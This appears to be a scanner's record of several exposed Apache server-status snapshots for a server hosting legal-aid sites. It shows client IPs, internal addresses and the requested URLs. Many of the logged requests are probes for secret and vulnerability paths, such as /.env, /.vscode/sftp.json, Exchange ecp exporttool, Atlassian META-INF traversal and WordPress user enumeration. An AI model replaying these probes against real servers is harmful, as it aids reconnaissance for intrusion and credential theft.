1-1130935/16/35296K 3.15107.50.481599.79 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-1151101/12/26275K 2.31115.30.051283.95 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 3-11265876/7/26735K 0.35007.60.011303.61 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-11245126/68/31528K 11.74007.30.471443.12 70.132.63.132http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 5-11313892/2/23736K 0.010342.50.001127.02 70.132.63.132http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 6-1155674/11/30223K 3.05004.80.041372.54 70.132.63.132http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 7-11275776/7/22733K 0.06008.20.011117.18 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-11281401/2/28234K 1.51001.10.031339.97 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-11281411/5/20819K 0.4321235.30.011028.94 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-11310721/1/19237K 0.01301.10.00900.49 70.132.63.86http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 11-11285306/8/18745K 0.48007.30.01893.16 70.132.63.132http/1.1picturingjustice.org:8080GET /about HTTP/1.1 12-11285311/2/17652K 0.7329181.10.01891.17 70.132.31.138http/1.1survey.alas.org:8080GET /admin/auth.php HTTP/1.1 13-11285530/2/16840W 0.65300.00.01865.24 15.158.40.113http/1.1intranet.alas.org:8080HEAD / HTTP/1.1 14-11288822/2/21643K 1.570080.50.08960.02 15.158.41.205http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-11259501/97/14759K 21.85101.10.54749.43 70.132.63.132http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 16-11288841/2/19072W 0.39001.60.01887.43 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 17-11288853/4/17206K 0.39303.60.01833.32 70.132.63.86http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 18-11289151/2/11389K 0.36001.10.00551.35 70.132.63.132http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 19-11289171/2/16318K 0.28101.10.02754.56 70.132.63.132http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 20-11264512/86/16405K 17.18118981.81.50669.60 15.158.40.83http/1.1survey.alas.org:8080HEAD / HTTP/1.1 21-11289197/8/10805K 0.29009.40.01525.03 70.132.63.132http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 22-11313902/2/14135K 0.01002.20.00602.83 70.132.63.132http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 23-11289651/1/13735K 0.48317696.50.01565.22 70.132.31.157http/1.1survey.alas.org:8080GET /index.php/admin/authentication/sa/login HTTP/1.1 24-11317431/1/12075K 0.011321.00.00555.62 70.132.63.165http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 25-11317441/1/8093K 0.00101.10.00353.60 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 26-11317681/1/8550K 0.01101.10.00357.70 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 27-11317691/1/7498K 0.00101.10.00278.47 70.132.63.132http/1.1picturingjustice.org:8080GET /s/6343e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 28-11321481/1/7237K 0.00011.50.00271.47 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 29-11321491/1/3694K 0.010505.40.01178.43 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 30-11321521/1/6272K 0.00021.60.00261.53 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 31-11321651/1/3215K 0.00001.10.00136.85 70.132.63.132http/1.1picturingjustice.org:8080GET /.vscode/sftp.json HTTP/1.1 32-11321661/1/6164K 0.00001.10.00252.25 70.132.63.132http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 33-11321861/1/7278K 0.010551.60.00308.57 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 34-11321871/1/3603K 0.00001.00.00151.70 70.132.63.132http/1.1picturingjustice.org:8080GET /about HTTP/1.1 35-11321881/1/5850K 0.00001.10.00216.46 70.132.63.132http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 36-11271581/90/3329W 18.19201.00.49180.10 15.158.16.237http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 37-11-0/0/3082. 0.0039900.00.00118.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5505. 0.0039800.00.00236.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5344. 0.0139700.00.00201.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11271840/88/5716W 17.32500.01.46294.22 15.158.41.205http/1.1intranet.alas.org:8080POST /wp-cron.php?doing_wp_cron=1676332980.91155290603637695312 41-11-0/0/3618. 0.00513600.00.00118.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1741. 2.65601700.00.0056.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/1985. 0.01665800.00.0051.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1567. 0.00666000.00.0049.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11-0/0/1832. 0.00665900.00.0063.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-11-0/0/1456. 0.12661700.00.0046.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1092. 0.02665700.00.0029.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1118. 0.02665600.00.0027.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/913. 0.00665500.00.0043.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11-0/0/1396. 0.28622600.00.0048.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-11-0/0/1320. 0.001841900.00.0041.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/898. 0.001841800.00.0022.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1068. 0.001841600.00.0043.41 ::1http/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979a578e25a
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 00:03:04 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 17 hours 10 minutes 15 seconds Server load: 22.49 21.30 20.90 Total accesses: 638694 - Total Traffic: 28.5 GB CPU Usage: u171.1 s9.72 cu0 cs0 - .0179% CPU load .631 requests/sec - 29.5 kB/second - 46.8 kB/request 30 requests currently being processed, 0 idle workers KKWKKKKKKKKKKWKKKKKKKKKKKKKK........W...W....................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11129863/64/35025K 13.721762.40.301636.57 15.158.40.83http/1.1secure.alas.org:8080HEAD / HTTP/1.1 1-1130934/15/35295K 3.15105.90.481599.79 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-1151100/11/26274W 2.31000.00.041283.95 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 3-11265875/6/26734K 0.35106.50.011303.60 70.132.63.132http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 4-11245125/67/31527K 11.74106.20.471443.11 70.132.63.132http/1.1picturingjustice.org:8080GET /s/7363e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 5-11313891/1/23735K 0.00101.10.001127.01 70.132.63.132http/1.1picturingjustice.org:8080GET /s/6323e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 6-1155673/10/30222K 3.05113.70.041372.54 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-11275775/6/22732K 0.06106.60.011117.18 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 8-11281401/1/28233K 1.514632431.00.031339.97 15.158.16.237http/1.1events.alas.org:8080GET / HTTP/1.1 9-11281411/5/20819K 0.4311235.30.011028.94 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-11310721/1/19237K 0.01201.10.00900.49 70.132.63.86http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 11-11285305/7/18744K 0.48106.30.01893.16 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 12-11285311/2/17652K 0.7319181.10.01891.17 70.132.31.138http/1.1survey.alas.org:8080GET /admin/auth.php HTTP/1.1 13-11285530/2/16840W 0.65200.00.01865.24 15.158.40.113http/1.1intranet.alas.org:8080HEAD / HTTP/1.1 14-11288821/1/21642K 1.571566679.00.08960.02 15.158.41.205http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 15-11259501/97/14759K 21.85001.10.54749.43 70.132.63.132http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 16-11288841/2/19072K 0.39001.60.01887.43 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 17-11288853/4/17206K 0.39103.60.01833.32 70.132.63.86http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 18-11289151/1/11388K 0.36411351.10.00551.35 70.132.31.138http/1.1survey.alas.org:8080GET /admin/ HTTP/1.1 19-11289171/1/16317K 0.284178122.70.02754.56 130.176.162.73http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 20-11264512/86/16405K 17.18018981.81.50669.60 15.158.40.83http/1.1survey.alas.org:8080HEAD / HTTP/1.1 21-11289196/7/10804K 0.29008.40.01525.03 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-11313901/1/14134K 0.01101.10.00602.83 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-11289651/1/13735K 0.48217696.50.01565.22 70.132.31.157http/1.1survey.alas.org:8080GET /index.php/admin/authentication/sa/login HTTP/1.1 24-11317431/1/12075K 0.010321.00.00555.62 70.132.63.165http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 25-11317441/1/8093K 0.00001.10.00353.60 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 26-11317681/1/8550K 0.01001.10.00357.70 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 27-11317691/1/7498K 0.00001.10.00278.47 70.132.63.132http/1.1picturingjustice.org:8080GET /s/6343e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 28-11-0/0/7236. 0.0040400.00.00271.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-11-0/0/3693. 0.0040100.00.00178.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-11-0/0/6271. 0.0140200.00.00261.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-11-0/0/3214. 0.7237100.00.00136.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-11-0/0/6163. 0.0040000.00.00252.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7277. 13.623500.00.00308.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3602. 0.0039900.00.00151.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11-0/0/5849. 0.3438500.00.00216.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11271581/90/3329W 18.19101.00.49180.10 15.158.16.237http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 37-11-0/0/3082. 0.0039800.00.00118.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5505. 0.0039700.00.00236.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5344. 0.0139600.00.00201.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11271840/88/5716W 17.32300.01.46294.22 15.158.41.205http/1.1intranet.alas.org:8080POST /wp-cron.php?doing_wp_cron=1676332980.91155290603637695312 41-11-0/0/3618. 0.00513500.00.00118.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1741. 2.65601500.00.0056.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/1985. 0.01665600.00.0051.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1567. 0.00665800.00.0049.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11-0/0/1832. 0.00665700.00.0063.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-11-0/0/1456. 0.12661500.00.0046.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1092. 0.02665500.00.0029.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1118. 0.02665400.00.0027.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/913. 0.00665300.00.0043.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11-0/0/1396. 0.28622500.00.0048.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-11-0/0/1320. 0.001841800.00.0041.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/898. 0.001841700.00.0022.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1068. 0.001841500.00.0043.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1045. 0.011841400.00.0047.88 ::1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97912ccb1d7
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 00:03:05 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 17 hours 10 minutes 15 seconds Server load: 22.54 21.33 20.91 Total accesses: 638702 - Total Traffic: 28.5 GB CPU Usage: u170.46 s9.64 cu0 cs0 - .0178% CPU load .631 requests/sec - 29.5 kB/second - 46.8 kB/request 34 requests currently being processed, 0 idle workers KKKKKKKKCKKKKWKKKKKKKKKKKKKKKWSKKSSSW...W....................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11129863/64/35025K 13.722762.40.301636.57 15.158.40.83http/1.1secure.alas.org:8080HEAD / HTTP/1.1 1-1130935/16/35296K 3.15007.50.481599.79 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-1151101/12/26275K 2.31015.30.051283.95 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 3-11265875/6/26734K 0.35206.50.011303.60 70.132.63.132http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 4-11245125/67/31527K 11.74206.20.471443.11 70.132.63.132http/1.1picturingjustice.org:8080GET /s/7363e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 5-11313891/1/23735K 0.00201.10.001127.01 70.132.63.132http/1.1picturingjustice.org:8080GET /s/6323e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 6-1155673/10/30222K 3.05213.70.041372.54 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-11275775/6/22732K 0.06206.60.011117.18 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 8-11281401/1/28233C 1.515632431.00.031339.97 15.158.16.237http/1.1events.alas.org:8080GET / HTTP/1.1 9-11281411/5/20819K 0.4321235.30.011028.94 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-11310721/1/19237K 0.01301.10.00900.49 70.132.63.86http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 11-11285305/7/18744K 0.48206.30.01893.16 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 12-11285311/2/17652K 0.7329181.10.01891.17 70.132.31.138http/1.1survey.alas.org:8080GET /admin/auth.php HTTP/1.1 13-11285530/2/16840W 0.65300.00.01865.24 15.158.40.113http/1.1intranet.alas.org:8080HEAD / HTTP/1.1 14-11288822/2/21643K 1.570080.50.08960.02 15.158.41.205http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-11259501/97/14759K 21.85101.10.54749.43 70.132.63.132http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 16-11288841/2/19072K 0.39101.60.01887.43 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 17-11288853/4/17206K 0.39203.60.01833.32 70.132.63.86http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 18-11289151/2/11389K 0.36001.10.00551.35 70.132.63.132http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 19-11289171/2/16318K 0.28001.10.02754.56 70.132.63.132http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 20-11264512/86/16405K 17.18118981.81.50669.60 15.158.40.83http/1.1survey.alas.org:8080HEAD / HTTP/1.1 21-11289196/7/10804K 0.29108.40.01525.03 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-11313901/1/14134K 0.01201.10.00602.83 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-11289651/1/13735K 0.48317696.50.01565.22 70.132.31.157http/1.1survey.alas.org:8080GET /index.php/admin/authentication/sa/login HTTP/1.1 24-11317431/1/12075K 0.011321.00.00555.62 70.132.63.165http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 25-11317441/1/8093K 0.00101.10.00353.60 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 26-11317681/1/8550K 0.01101.10.00357.70 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 27-11317691/1/7498K 0.00101.10.00278.47 70.132.63.132http/1.1picturingjustice.org:8080GET /s/6343e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 28-11321481/1/7237K 0.00011.50.00271.47 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 29-11321490/0/3693W 0.00000.00.00178.43 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 30-11321520/0/6271S 0.0140300.00.00261.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-11321651/1/3215K 0.00001.10.00136.85 70.132.63.132http/1.1picturingjustice.org:8080GET /.vscode/sftp.json HTTP/1.1 32-11321661/1/6164K 0.00001.10.00252.25 70.132.63.132http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 33-11321860/0/7277S 13.623600.00.00308.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11321870/0/3602S 0.0040000.00.00151.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11321880/0/5849S 0.3438600.00.00216.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11271581/90/3329W 18.19101.00.49180.10 15.158.16.237http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 37-11-0/0/3082. 0.0039900.00.00118.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5505. 0.0039800.00.00236.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5344. 0.0139700.00.00201.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11271840/88/5716W 17.32400.01.46294.22 15.158.41.205http/1.1intranet.alas.org:8080POST /wp-cron.php?doing_wp_cron=1676332980.91155290603637695312 41-11-0/0/3618. 0.00513600.00.00118.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1741. 2.65601600.00.0056.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/1985. 0.01665700.00.0051.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1567. 0.00665900.00.0049.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11-0/0/1832. 0.00665800.00.0063.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-11-0/0/1456. 0.12661600.00.0046.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1092. 0.02665600.00.0029.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1118. 0.02665500.00.0027.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/913. 0.00665400.00.0043.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11-0/0/1396. 0.28622600.00.0048.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-11-0/0/1320. 0.001841900.00.0041.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/898. 0.001841800.00.0022.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1068. 0.001841600.00.0043.41 ::1http/1.1atlantalegalaid.org:8080</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979f7a88e35
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 00:03:03 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 17 hours 10 minutes 13 seconds Server load: 22.49 21.30 20.90 Total accesses: 638680 - Total Traffic: 28.5 GB CPU Usage: u204.14 s11.16 cu0 cs0 - .0213% CPU load .631 requests/sec - 29.5 kB/second - 46.8 kB/request 24 requests currently being processed, 0 idle workers WKKKK.KKKWKKKWKWKKKKWK.K............K...W....................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11129862/63/35024W 13.70001.50.301636.57 15.158.40.83http/1.1secure.alas.org:8080HEAD / HTTP/1.1 1-1130934/15/35295K 3.15005.90.481599.79 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-1151101/10/26273K 2.051931.50.041283.94 15.158.41.205http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-11265875/6/26734K 0.35006.50.011303.60 70.132.63.132http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 4-11245125/67/31527K 11.74006.20.471443.11 70.132.63.132http/1.1picturingjustice.org:8080GET /s/7363e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 5-11-0/0/23734. 35.78100.00.001127.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-1155673/10/30222K 3.05013.70.041372.54 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-11275775/6/22732K 0.06006.60.011117.18 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 8-11281401/1/28233K 1.512632431.00.031339.97 15.158.16.237http/1.1events.alas.org:8080GET / HTTP/1.1 9-11281410/4/20818W 0.39000.00.011028.93 70.132.63.132http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-11310721/1/19237K 0.01001.10.00900.49 70.132.63.86http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 11-11285305/7/18744K 0.48006.30.01893.16 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 12-11285311/2/17652K 0.7309181.10.01891.17 70.132.31.138http/1.1survey.alas.org:8080GET /admin/auth.php HTTP/1.1 13-11285530/2/16840W 0.65100.00.01865.24 15.158.40.113http/1.1intranet.alas.org:8080HEAD / HTTP/1.1 14-11288821/1/21642K 1.570566679.00.08960.02 15.158.41.205http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 15-11259500/95/14757W 21.34100.00.54749.43 15.158.40.83http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-11288841/1/19071K 0.39414975.90.01887.43 70.132.31.79http/1.1survey.alas.org:8080GET /panel.php HTTP/1.1 17-11288853/4/17206K 0.39003.60.01833.32 70.132.63.86http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 18-11289151/1/11388K 0.36311351.10.00551.35 70.132.31.138http/1.1survey.alas.org:8080GET /admin/ HTTP/1.1 19-11289171/1/16317K 0.283178122.70.02754.56 130.176.162.73http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 20-11264511/85/16404W 16.72100.91.50669.60 15.158.40.83http/1.1survey.alas.org:8080HEAD / HTTP/1.1 21-11289195/6/10803K 0.29006.70.01525.03 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 22-11-0/0/14133. 0.00300.00.00602.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-11289651/1/13735K 0.48117696.50.01565.22 70.132.31.157http/1.1survey.alas.org:8080GET /index.php/admin/authentication/sa/login HTTP/1.1 24-11-0/0/12074. 0.0140700.00.00555.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-11-0/0/8092. 0.0140200.00.00353.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-11-0/0/8549. 0.0040500.00.00357.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-11-0/0/7497. 0.0040400.00.00278.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-11-0/0/7236. 0.0040300.00.00271.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-11-0/0/3693. 0.0040000.00.00178.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-11-0/0/6271. 0.0140100.00.00261.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-11-0/0/3214. 0.7236900.00.00136.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-11-0/0/6163. 0.0039900.00.00252.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7277. 13.623400.00.00308.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3602. 0.0039800.00.00151.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11-0/0/5849. 0.3438400.00.00216.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11271581/90/3329K 18.19172451.00.49180.10 15.158.16.237http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-11-0/0/3082. 0.0039700.00.00118.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5505. 0.0039600.00.00236.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5344. 0.0139500.00.00201.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11271840/88/5716W 17.32200.01.46294.22 15.158.41.205http/1.1intranet.alas.org:8080POST /wp-cron.php?doing_wp_cron=1676332980.91155290603637695312 41-11-0/0/3618. 0.00513400.00.00118.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1741. 2.65601400.00.0056.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/1985. 0.01665500.00.0051.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1567. 0.00665700.00.0049.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * 